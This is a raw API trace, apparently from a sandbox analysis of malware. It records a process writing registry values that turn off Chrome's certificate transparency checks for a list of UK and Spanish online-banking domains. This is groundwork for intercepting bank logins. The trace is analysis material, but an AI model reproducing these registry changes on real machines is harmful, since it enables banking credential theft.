	[0192.741] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191ee8 | out: hHeap=0x260000) returned 1
	[0192.741] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f38 | out: hHeap=0x260000) returned 1
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c538
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33ab40
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33ab88
	[0192.741] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33ab40 | out: hHeap=0x260000) returned 1
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f38
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33ab40
	[0192.742] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33ab88 | out: hHeap=0x260000) returned 1
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33ab88
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33abd0
	[0192.742] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33ab40 | out: hHeap=0x260000) returned 1
	[0192.742] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f38 | out: hHeap=0x260000) returned 1
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27e078
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0192.742] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27e078 | out: hHeap=0x260000) returned 1
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f38
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f568
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x4b0) returned 0x117d7f8
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191ee8
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33ab40
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f10
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f3a8
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33ac18
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b78
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191fd8
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33ac60
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1192000
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185be8
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33aca8
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b40
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1192028
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33acf0
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1192050
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178ff8
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33ad38
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x11793c0
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185d00
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33ad80
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185d38
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33adc8
	[0192.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33ae10
	[0192.743] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33ae58
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185c58 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3387e8 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185c20 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d80 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c5c8 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d58 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185cc8 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33a9d8 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185c90 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e98 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33a990 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e48 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33aa68 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191fb0 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33aa20 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f88 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33aaf8 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33aab0 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c388 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185bb0 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c460 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185b08 | out: hHeap=0x260000) returned 1
	[0192.743] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1175330 | out: hHeap=0x260000) returned 1
	[0192.743] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f88
	[0192.743] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c460
	[0192.743] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191fb0
	[0192.743] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c388
	[0192.743] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c5c8
	[0192.743] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33aab0
	[0192.743] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e48
	[0192.743] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b08
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f568 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f38 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33abd0 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33ab88 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c538 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f60 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d30 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f140 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191df8 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191da8 | out: hHeap=0x260000) returned 1
	[0192.744] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x312e30 | out: hHeap=0x260000) returned 1
	[0192.759] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x424) returned 0x0
	[0192.759] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x42c, lpdwDisposition=0x0) returned 0x0
	[0192.759] RegSetValueExA (in: hKey=0x42c, lpValueName="111", Reserved=0x0, dwType=0x1, lpData="www.rbsdigital.com", cbData=0x12 | out: lpData="www.rbsdigital.com") returned 0x0
	[0192.760] RegCloseKey (hKey=0x42c) returned 0x0
	[0192.760] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x428) returned 0x0
	[0192.761] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x430, lpdwDisposition=0x0) returned 0x0
	[0192.761] RegSetValueExA (in: hKey=0x430, lpValueName="112", Reserved=0x0, dwType=0x1, lpData="rbsdigital.com", cbData=0xe | out: lpData="rbsdigital.com") returned 0x0
	[0192.762] RegCloseKey (hKey=0x430) returned 0x0
	[0192.762] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x42c) returned 0x0
	[0192.762] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x434, lpdwDisposition=0x0) returned 0x0
	[0192.762] RegSetValueExA (in: hKey=0x434, lpValueName="113", Reserved=0x0, dwType=0x1, lpData="www.nwolb.com", cbData=0xd | out: lpData="www.nwolb.com") returned 0x0
	[0192.764] RegCloseKey (hKey=0x434) returned 0x0
	[0192.764] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x430) returned 0x0
	[0192.764] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x438, lpdwDisposition=0x0) returned 0x0
	[0192.764] RegSetValueExA (in: hKey=0x438, lpValueName="114", Reserved=0x0, dwType=0x1, lpData="nwolb.com", cbData=0x9 | out: lpData="nwolb.com") returned 0x0
	[0192.766] RegCloseKey (hKey=0x438) returned 0x0
	[0192.766] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x434) returned 0x0
	[0192.766] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x43c, lpdwDisposition=0x0) returned 0x0
	[0192.766] RegSetValueExA (in: hKey=0x43c, lpValueName="115", Reserved=0x0, dwType=0x1, lpData="retail.santander.co.uk", cbData=0x16 | out: lpData="retail.santander.co.uk") returned 0x0
	[0192.767] RegCloseKey (hKey=0x43c) returned 0x0
	[0192.767] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x438) returned 0x0
	[0192.767] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x440, lpdwDisposition=0x0) returned 0x0
	[0192.768] RegSetValueExA (in: hKey=0x440, lpValueName="116", Reserved=0x0, dwType=0x1, lpData="online.bankofscotland.co.uk", cbData=0x1b | out: lpData="online.bankofscotland.co.uk") returned 0x0
	[0192.769] RegCloseKey (hKey=0x440) returned 0x0
	[0192.769] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x43c) returned 0x0
	[0192.769] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x444, lpdwDisposition=0x0) returned 0x0
	[0192.769] RegSetValueExA (in: hKey=0x444, lpValueName="117", Reserved=0x0, dwType=0x1, lpData="ebanking.es.rbcis.com", cbData=0x15 | out: lpData="ebanking.es.rbcis.com") returned 0x0
	[0192.771] RegCloseKey (hKey=0x444) returned 0x0
	[0192.771] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x440) returned 0x0
	[0192.771] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x448, lpdwDisposition=0x0) returned 0x0
	[0192.771] RegSetValueExA (in: hKey=0x448, lpValueName="118", Reserved=0x0, dwType=0x1, lpData="www.volkswagenbank.es", cbData=0x15 | out: lpData="www.volkswagenbank.es") returned 0x0
	[0192.773] RegCloseKey (hKey=0x448) returned 0x0
	[0192.773] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x444) returned 0x0
	[0192.773] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x44c, lpdwDisposition=0x0) returned 0x0
	[0192.773] RegSetValueExA (in: hKey=0x44c, lpValueName="119", Reserved=0x0, dwType=0x1, lpData="volkswagenbank.es", cbData=0x11 | out: lpData="volkswagenbank.es") returned 0x0
	[0192.774] RegCloseKey (hKey=0x44c) returned 0x0
	[0192.774] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x448) returned 0x0
	[0192.775] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x450, lpdwDisposition=0x0) returned 0x0
	[0192.775] RegSetValueExA (in: hKey=0x450, lpValueName="120", Reserved=0x0, dwType=0x1, lpData="clientes.selfbank.es", cbData=0x14 | out: lpData="clientes.selfbank.es") returned 0x0
	[0192.776] RegCloseKey (hKey=0x450) returned 0x0
	[0192.776] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x44c) returned 0x0
	[0192.776] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x454, lpdwDisposition=0x0) returned 0x0
	[0192.776] RegSetValueExA (in: hKey=0x454, lpValueName="121", Reserved=0x0, dwType=0x1, lpData="bancoonline.openbank.es", cbData=0x17 | out: lpData="bancoonline.openbank.es") returned 0x0
	[0192.778] RegCloseKey (hKey=0x454) returned 0x0
	[0192.778] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x450) returned 0x0
	[0192.778] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x458, lpdwDisposition=0x0) returned 0x0
	[0192.778] RegSetValueExA (in: hKey=0x458, lpValueName="122", Reserved=0x0, dwType=0x1, lpData="id.oney.es", cbData=0xa | out: lpData="id.oney.es") returned 0x0
	[0192.780] RegCloseKey (hKey=0x458) returned 0x0
	[0192.780] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x454) returned 0x0
	[0192.780] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x45c, lpdwDisposition=0x0) returned 0x0
	[0192.780] RegSetValueExA (in: hKey=0x45c, lpValueName="123", Reserved=0x0, dwType=0x1, lpData="clientes.uci.es", cbData=0xf | out: lpData="clientes.uci.es") returned 0x0
	[0192.781] RegCloseKey (hKey=0x45c) returned 0x0
	[0192.781] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x458) returned 0x0
	[0192.781] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x460, lpdwDisposition=0x0) returned 0x0
	[0192.782] RegSetValueExA (in: hKey=0x460, lpValueName="124", Reserved=0x0, dwType=0x1, lpData="www.bankia.es", cbData=0xd | out: lpData="www.bankia.es") returned 0x0
	[0192.783] RegCloseKey (hKey=0x460) returned 0x0
	[0192.783] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x45c) returned 0x0
	[0192.783] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x464, lpdwDisposition=0x0) returned 0x0
	[0192.783] RegSetValueExA (in: hKey=0x464, lpValueName="125", Reserved=0x0, dwType=0x1, lpData="bankia.es", cbData=0x9 | out: lpData="bankia.es") returned 0x0
	[0192.785] RegCloseKey (hKey=0x464) returned 0x0
	[0192.785] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x460) returned 0x0
	[0192.785] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x468, lpdwDisposition=0x0) returned 0x0
	[0192.785] RegSetValueExA (in: hKey=0x468, lpValueName="126", Reserved=0x0, dwType=0x1, lpData="www2.targobank.es", cbData=0x11 | out: lpData="www2.targobank.es") returned 0x0
	[0192.787] RegCloseKey (hKey=0x468) returned 0x0
	[0192.787] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x464) returned 0x0
	[0192.787] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x46c, lpdwDisposition=0x0) returned 0x0
	[0192.787] RegSetValueExA (in: hKey=0x46c, lpValueName="127", Reserved=0x0, dwType=0x1, lpData="www.novobanco.es", cbData=0x10 | out: lpData="www.novobanco.es") returned 0x0
	[0192.788] RegCloseKey (hKey=0x46c) returned 0x0
	[0192.788] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x468) returned 0x0
	[0192.788] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x470, lpdwDisposition=0x0) returned 0x0
	[0192.789] RegSetValueExA (in: hKey=0x470, lpValueName="128", Reserved=0x0, dwType=0x1, lpData="novobanco.es", cbData=0xc | out: lpData="novobanco.es") returned 0x0
	[0192.790] RegCloseKey (hKey=0x470) returned 0x0
	[0192.790] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x46c) returned 0x0
	[0192.790] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x474, lpdwDisposition=0x0) returned 0x0
	[0192.790] RegSetValueExA (in: hKey=0x474, lpValueName="129", Reserved=0x0, dwType=0x1, lpData="www2.popularbancaprivada.es", cbData=0x1b | out: lpData="www2.popularbancaprivada.es") returned 0x0
	[0192.792] RegCloseKey (hKey=0x474) returned 0x0
	[0192.792] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x470) returned 0x0
	[0192.792] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x478, lpdwDisposition=0x0) returned 0x0
	[0192.792] RegSetValueExA (in: hKey=0x478, lpValueName="130", Reserved=0x0, dwType=0x1, lpData="conecta.es.rbcis.com", cbData=0x14 | out: lpData="conecta.es.rbcis.com") returned 0x0
	[0192.794] RegCloseKey (hKey=0x478) returned 0x0
	[0192.794] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x474) returned 0x0
	[0192.794] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x47c, lpdwDisposition=0x0) returned 0x0
